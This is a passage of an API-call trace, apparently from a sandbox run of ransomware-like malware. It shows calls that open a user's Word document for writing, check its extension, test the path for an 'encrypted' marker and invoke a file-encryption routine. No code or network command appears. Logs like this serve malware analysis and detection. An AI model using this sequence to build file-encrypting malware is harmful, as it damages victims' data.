dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.936] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.936] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.936] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.936] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.936] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.936] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.936] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.936] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.937] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8898c8 [0032.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8898c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.937] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cigoy5u5b6axtcb.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.937] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.937] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.937] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0032.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.938] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.938] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0032.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.938] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.938] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.938] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.938] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.938] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.939] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.939] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.939] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0032.939] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.939] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bf33a0, ftCreationTime.dwHighDateTime=0x1d554dd, ftLastAccessTime.dwLowDateTime=0x87b8dd90, ftLastAccessTime.dwHighDateTime=0x1d57b4f, ftLastWriteTime.dwLowDateTime=0x87b8dd90, ftLastWriteTime.dwHighDateTime=0x1d57b4f, nFileSizeHigh=0x0, nFileSizeLow=0x1524d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="CIgOY5U5b6Axtcb.docx", cAlternateFileName="CIGOY5~1.DOC")) returned 0x7c20c0 [0032.940] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bf33a0, ftCreationTime.dwHighDateTime=0x1d554dd, ftLastAccessTime.dwLowDateTime=0x87b8dd90, ftLastAccessTime.dwHighDateTime=0x1d57b4f, ftLastWriteTime.dwLowDateTime=0x87b8dd90, ftLastWriteTime.dwHighDateTime=0x1d57b4f, nFileSizeHigh=0x0, nFileSizeLow=0x1524d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="CIgOY5U5b6Axtcb.docx", cAlternateFileName="CIGOY5~1.DOC")) returned 0x7c20c0 [0032.940] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.940] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CIgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IgOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gOY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OY5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Axtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xtcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tcb.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.942] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.942] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.942] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, 